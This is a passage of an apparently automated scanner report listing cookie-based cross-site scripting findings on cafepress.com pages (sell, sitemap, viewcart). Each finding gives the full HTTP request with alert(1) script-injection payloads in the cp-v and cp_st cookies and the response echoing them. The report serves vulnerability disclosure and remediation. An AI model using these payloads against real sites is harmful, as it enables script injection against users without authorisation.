__utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 62950
Date: Sun, 26 Dec 2010 13:46:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 62950


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
n_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'HelpPage'
window.cafepress.tealeaf.searchTerm = 'dc886</script><script>alert(1)</script>e31d106e7a6'
window.cafepress.tealeaf.salesChannel = 'Other'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0
...[SNIP]...

1.90. http://www.cafepress.com/cp/info/sell/index.aspx [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /cp/info/sell/index.aspx

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 993ac"-alert(1)-"2f0f584fdd2 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cp/info/sell/index.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA993ac"-alert(1)-"2f0f584fdd2; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 51652
Date: Sun, 26 Dec 2010 13:46:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 51652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA993ac"-alert(1)-"2f0f584fdd2";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.91. http://www.cafepress.com/cp/info/sell/index.aspx [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /cp/info/sell/index.aspx

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41f40</script><script>alert(1)</script>dbb7f115d79 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cp/info/sell/index.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=41f40</script><script>alert(1)</script>dbb7f115d79; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 51674
Date: Sun, 26 Dec 2010 13:46:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 51674


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
s.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = '/cp/info/sell/index.aspx'
window.cafepress.tealeaf.searchTerm = '41f40</script><script>alert(1)</script>dbb7f115d79'
window.cafepress.tealeaf.salesChannel = 'Other'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0
...[SNIP]...

1.92. http://www.cafepress.com/cp/sitemap/ [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /cp/sitemap/

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8570a"-alert(1)-"90117c7ff9b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cp/sitemap/ HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA8570a"-alert(1)-"90117c7ff9b; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 147634
Date: Sun, 26 Dec 2010 13:46:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 147634


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8570a"-alert(1)-"90117c7ff9b";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.93. http://www.cafepress.com/cp/sitemap/ [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /cp/sitemap/

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1af17</script><script>alert(1)</script>e3cc51a30ee was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cp/sitemap/ HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=1af17</script><script>alert(1)</script>e3cc51a30ee; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 149634
Date: Sun, 26 Dec 2010 13:46:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 149634


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
ess.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = '/cp/sitemap/index.aspx'
window.cafepress.tealeaf.searchTerm = '1af17</script><script>alert(1)</script>e3cc51a30ee'
window.cafepress.tealeaf.salesChannel = 'Other'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0
...[SNIP]...

1.94. http://www.cafepress.com/cp/viewcart.aspx [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /cp/viewcart.aspx

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e199a"-alert(1)-"33c6f5a13e was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cp/viewcart.aspx?s=search HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAe199a"-alert(1)-"33c6f5a13e; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 51172
Date: Sun, 26 Dec 2010 13:46:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cart_item_count=0; domain=cafepress.com; expires=Sat, 26-Mar-2011 12:46:51 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Content-Length: 51172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe199a"-alert(1)-"33c6f5a13e";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.95. http://www.cafepress.com/cp/viewcart.aspx [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /cp/viewcart.aspx

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 197e0</script><script>alert(1)</script>ccc939a9ef5 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

